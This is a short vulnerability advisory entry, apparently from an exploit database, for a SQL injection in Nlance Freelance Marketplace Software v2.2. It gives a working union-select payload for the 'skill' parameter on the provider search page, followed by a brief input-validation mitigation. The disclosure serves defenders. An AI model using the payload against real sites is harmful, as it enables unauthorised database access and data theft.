vendor:
Nlance
by:
Ihsan Sencan
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Nlance
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017
Nlance – Freelance Marketplace Software v2.2 – SQL Injection
Nlance - Freelance Marketplace Software v2.2 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries via the 'skill' parameter in the 'search/provider/' page. For example, http://localhost/[PATH]/search/provider/?skill=[SQL] -38'+/*!50000union*/+select+1,@@version--+- can be used to inject malicious SQL queries.
Mitigation:
Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.